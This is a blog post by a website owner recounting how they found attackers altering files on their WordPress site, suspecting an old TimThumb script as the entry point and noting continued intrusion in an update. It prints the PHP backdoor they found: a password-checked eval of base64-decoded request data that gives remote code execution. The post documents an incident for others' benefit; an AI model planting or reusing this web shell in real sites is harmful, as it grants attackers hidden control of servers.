:::: MENU ::::

Found you, you bastard!

After days of searching, I finally found out how those hackers kept adding and altering files on monkeylaw.org. Tucked away in the bowels of my WordPress installation were some files who
In some of my WordPress subfolders, some PHP files had code added at the top:

<?php /**RbMiTpUrSl*/if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) { /**ImOmZtEwJz*/eval(base64_decode($_REQUEST["mod_content"])); /**BjTjFmFxRu*/exit();/**YjWlRqAmIs*/ } ?>

I looked through my HTTP logs and found that, yup, I was getting requests at several of these files with long, encoded mod_content values. I tested one of these and it did indeed make the wp-stat.php file appear and modify .htaccess. So that’s the hack. I think the initial vector was probably TimThumb. I did have an old version of TimThumb, somewhere in some unused theme, but didn’t give it a thought because I didn’t use it. I now know better.

The funny thing is, that wasn’t the only hack on my system. Another involved the forums at stripshow.monkeylaw.org — apparently people were able to upload malicious files there, and I don’t know what those files did. So I will have to remain vigilant and see if anything like that returns.

But for right now, I’m content to crack a beer and sit back for a bit.

Update: OK, looks like no sitting back just yet. Turns out they still have some kind of way in. The files appear to be changing, too. Weird.


So, what do you think ?